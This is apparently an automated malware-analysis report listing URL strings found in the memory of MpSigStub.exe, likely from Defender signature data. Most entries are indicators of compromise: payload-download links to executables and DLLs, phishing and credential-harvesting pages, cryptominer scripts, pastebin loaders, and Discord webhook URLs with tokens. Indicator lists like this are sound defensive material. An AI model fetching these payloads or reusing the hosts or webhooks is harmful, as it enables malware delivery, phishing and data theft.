Source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp String found in binary or memory: https://appupdate.herokuapp.com
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://archaeology.ideaschema.com/hiwork.php
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: https://armybar.hopto.org/remoteload.dotm
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: https://userkade.com/21.psd
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: https://asushotfix.com/.
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: https://atacamaplotter.cl/wp-includes/fonts/reportpdfnew.php
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: https://ate.bz/now.php
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://attack.mitre.org
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: https://auth-server4.xyz/processor.php
Source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp String found in binary or memory: https://auth.tdameritrade.com/auth?response_type=code&redirect_uri=
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://authedmine.com/lib/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: https://autobusinessfunnel.com/wp-admin/css/colors/
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: https://avart.org/hdhdhk/xls/index.php?
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://azur.melhordev.com/.well-known/acme-challenge/std/php/
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://b.top4top.io/p_15665ejq60.jpg
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: https://bankline.itau.com.br/
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: https://bankline.itau.com.br/GRIPNET/bklcgi.exe
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://bankss-71.ml/2.dll
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://batc.dyndns.dk/minto3/next.php
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://bb.realestateprivateportfolio.com/img/
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: https://bbcgroup.co.in/qpipsriug.php
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: https://beetibutron.xyz/rowdy/brand.php
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://behendige-boxers.nl/ds/0902.gif
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://benabase.com/cgi_bin/amvzdxmuc3vhcmv6qhzvbg90zweuy29t
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: https://benchlings.com/
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: https://benchlings.com/xoxo/next.php
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://berlitzalahsa.sa/sport/rockstar.php
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: https://besthybridcar.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://bigup.marketing/wp-content/plugins/seo_index/hloym4kndci.php
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp String found in binary or memory: https://bipblocker.com/get_config/
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/3kthd4j
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/3kvdcmi
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org/kimrakfl33/git/raw/master/kinsingchmod
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://bk.kv-dv8.club/?e=bbeckler
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://blackberryizm.com/frontend/assets/images/favico/
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://bm.jb-voice.online/?e=accounting
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://bribble.com/
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: https://burnleyd.cf/brand.php
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: https://butikzai.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: https://bydinvestments.com/cache/rainer/258720/rainer&#46;bauer
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://c-0li.club/?e=JPohlman
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: https://cablenet.com.ec/drms/bb.html
Source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp String found in binary or memory: https://calfeutragebprs%.com/wp%-content/image/s3%.php
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: https://camillesanz.com/lib/status.js
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: https://carpascapital.com/gbpg8mtsgbv/ka.html
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: https://casciscus.com/wp-admin/v4/
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://casciscus.com/wp-admin/v4/pocket.php
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://cazala.github.io/coin-hive-proxy/client.js?
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://cctraff.ru/
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: https://cdn-105.anonfiles.com/
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18307613737.0000021B5E0EE000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/844726578415665236/846209246264688650/
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/859130004898447360/869326380259758080/VodoKanalForms.dll
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/859130004898447360/871143663751823370/Anasayfa.dll
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/876742387932745741/876743456536559656/steammaa.dll
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dll
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dllx
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://cdshgvjs.ygto.com/leo/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://ceibosnorte.com/images/clients/01/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: https://chiddingstonenursery.co.uk/loign.php?user=
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: https://childrenplacebd.com/childrendc/
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: https://childrenplacebd.com/childrendc/polo.php
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://chinatyres.net/IuNbOpen/oiUnbYATR.php
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: https://chogoon.com/srt/d7q0j
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: https://chpingnow.xyz/21.psd
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://clashwoman.info/
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://cnaaa11sd.gb.net/efcdsvftgxc/?gdes3sc=6sdfr45
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: https://co3.live
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://coki.me/a5oly
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://coki.me/az2yl
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://coki.me/epnq7
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://coki.me/xmwds
Source: MpSigStub.exe, 0000000B.00000003.18265076735.0000021B4BD14000.00000004.00000001.sdmp String found in binary or memory: https://configdl.teamviewer.com/configs
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://connect.statetechlink.xyz/?e=
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://connectoutlook.email/main.php
Source: MpSigStub.exe, 0000000B.00000003.18276905837.0000021B5FDE8000.00000004.00000001.sdmp String found in binary or memory: https://content.dropboxapi.com/2/files/upload
Source: MpSigStub.exe, 0000000B.00000003.18276905837.0000021B5FDE8000.00000004.00000001.sdmp String found in binary or memory: https://content.dropboxapi.com/2/files/uploadxA
Source: MpSigStub.exe, 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp String found in binary or memory: https://contirecovery.best
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: https://corazonarquitectura.com/94reej6f3mr/lipa.html
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://courieroffice.net/wp-admin/whatsapp1.php
Source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp String found in binary or memory: https://courieroffice.net/wp-content/post2.php
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: https://crashpad.chromium.org/
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: https://crashpad.chromium.org/x
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://creativechigz.co.zw/themes/newexceltoosab.php
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode.txt
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: https://crypto-loot.com/lib/miner.min.js
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://cut.ly/a2wiit8
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://cut.ly/nctboib
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://cutt.ly/nbcoprl
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/PROTOCOL.certkeys?rev=HEAD
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: https://d.lqw.me/xuiow/
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: https://d.symcb.com/rpa0)
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: https://dahamarli.xyz
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://darmatic.co.rs/ds/1502.gif
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://dashboard.imadeit.com.ng/ds/151120.gif
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://dawnamae.000webhostapp.com/exel.phpmethod=
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: https://de.gsearch.com.de/api/update.sh
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: https://debatestage.com/wp-admin/css/colors/blue/reportmaersk.php
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://dev-thegentlemans.teoria.agency/owa/next.php
Source: MpSigStub.exe, 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp String found in binary or memory: https://devcellsegovapiwebapp.azurewebsites.net/
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: https://diarnondfireplace.com/dobo/xxx.php?user=
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://dichthuatsnu.com/goodweb/pwofiles.php
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: https://diplomaticroll.com/
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/api/webhooks/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/api/webhooks/770716126988599316/o7GXYebuPQzx7RQFUD4cTOPMq2gGicypOMyNpFVQsIb9qyVW
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/api/webhooks/850115118066040833/lcFHGcD2eUjv1zEJO_Ped6EAVU7W44L8X3chfyx9YoIb7YBS
Source: MpSigStub.exe, 0000000B.00000003.18280918595.0000021B5F1EB000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/api/webhooks/x
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: https://discordapp.com/api/webhooks/757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: https://divelpid.my/wp-content/themes/monolit/woocommerce/global/aaie6jbhso9.php
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: https://divineleverage.org/de.php
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: https://dlya-detey.site/emz/reportdhlnew2.php
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://docs-eight-sable.vercel.app/
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/document/d/e/2pacx-1vtrc0l1v7hke7ebcnmumoqomoajhb5togg63zkisb68sj3z7lcmv9ndk
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/feeds/default/private/full?v=3
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: https://drp.su/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: https://dumpster-server.herokuapp.com/manager/query
Source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp String found in binary or memory: https://dynafivecon.com/ds/26.gif
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: https://ecosym.cl/firmas/wp-error.php
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://eeyhh567.s3.eu-west-3.amazonaws.com/image2.png
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: https://efishedo.info/?tag_id
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://eletrocoghi.com.br/drms/fert.html
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: https://emvoips.eononass.xyz/?e=%25
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://en.czonediver.com/ds/0502.gif
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: https://erythrocyte-gaskets.000webhostapp.com/ms/excelz/excelz/index.php?email=
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: https://expressen.se/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: https://extranet.carlsonwagonlit.com/gdsscripts/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://extraosseous.com/zik/
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://faog.org.hk/scanner/overwatch.php
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: https://fazalandsons.com.pk/wp-includes/ixr/class-ixr-base64.php
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: https://feedbackportal.download/ecm/ibm/3173379797/converter.dot
Source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp String found in binary or memory: https://ferra.xyz/glsdil.php
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: https://ov.m4sh-up1x.xyz/?e=
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: https://ovjdyp9iz3r.typeform.com/to/kpapmnfe
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://ozmontelectrical.com/drms/fert.html
Source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp String found in binary or memory: https://paste.ee/d/n9jsq/0
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://paste.ee/r/cikn9/0
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/G0jcGs79
Source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/g10EQ6PS
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: https://pastebinp.com/raw/1Tuj3CF7
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: https://pastebinp.com/raw/itDEZ39X
Source: MpSigStub.exe, 0000000B.00000003.18313410353.0000021B5F14C000.00000004.00000001.sdmp String found in binary or memory: https://pay.yac.mx
Source: MpSigStub.exe, 0000000B.00000003.18313410353.0000021B5F14C000.00000004.00000001.sdmp String found in binary or memory: https://pay.yac.mxx:
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://pd.gy-lnoice.online/?e=dskodras
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: https://pediatriadrgonzales.com/wp-content/themes/betheme/js/parallax/vrgcm7nkd.php
Source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp String found in binary or memory: https://peregrineplastics-my.sharepoint.com/:o:/g/personal/bsmith_peregrine_build/erg-sjvfekzmix8xbx
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://photofinderplus.com/s/?api=
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://picsum.photos/80
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://piedmontrescue.org/sport/rockstar.php
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://pigeonious.com/
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: https://pigeonious.com/img/
Source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp String found in binary or memory: https://pinkconnext.com/ds/26.gif
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: https://piscineconstruct.ro/kjy/index.php
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://plectrum.sebdelaweb.com/mnmn/index.php
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://preoccupationology.com/thisshit
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://pressionism.xyz/bbc.exe
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: https://pro-fit.pk/exploit.exe
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://produsedecalitate.ro/request.php
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: https://provodi.com/snn/
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: https://ps.ks-voicemail.online/?e=richana.nelson
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: https://ps.outlook.com/powershell-liveid
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: https://psychedelicassistedsessions.com/f2ewq5kfmdhcsac.exe-o%appdata%
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: https://ptpb.pw/jj9a
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://pxlme.me/cytyoc4h
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: https://pypi.python.org/packages/source/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://queentour.co.id/z/s.dot
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: https://quickbooks.aeymotors.com/soft.dll
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: https://rachelzy.com/yyyy/myoriginlogger.exe
Source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp String found in binary or memory: https://radh.ga/konzo/change.php
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp String found in binary or memory: https://ramashardware.co.za/
